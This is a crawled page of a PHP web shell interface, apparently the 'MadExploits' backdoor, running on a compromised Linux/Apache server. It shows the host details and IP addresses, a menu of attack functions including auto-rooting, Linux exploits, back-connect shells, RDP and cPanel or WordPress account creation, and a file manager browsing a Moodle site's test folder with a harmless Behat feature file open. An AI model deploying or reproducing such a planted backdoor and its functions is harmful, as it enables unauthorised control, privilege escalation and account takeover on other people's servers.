Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.130.44
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
enrol /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
add_to_group.feature
1.53
KB
-rw-r--r--
behat_enrol.php
4.34
KB
-rw-r--r--
enrol_user.feature
1013
B
-rw-r--r--
role_visibility.feature
1.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : enrol_user.feature
@enrol Feature: User can be enrolled into a course In order to let them participate in course activities As an admin I must be able to enrol users Background: Given the following "users" exist: | username | firstname | lastname | email | | student1 | Studie | One | student1@example.com | And the following "courses" exist: | fullname | shortname | | Course 001 | C001 | And I log in as "admin" And I am on "Course 001" course homepage Scenario: User can be enrolled without javascript When I enrol "Studie One" user as "Student" And I am on "Course 001" course homepage And I navigate to "Users > Enrolled users" in current page administration Then I should see "Studie One" @javascript Scenario: User can be enrolled with javascript enrol element When I enrol "Studie One" user as "Student" And I navigate to "Users > Enrolled users" in current page administration Then I should see "Studie One"
Close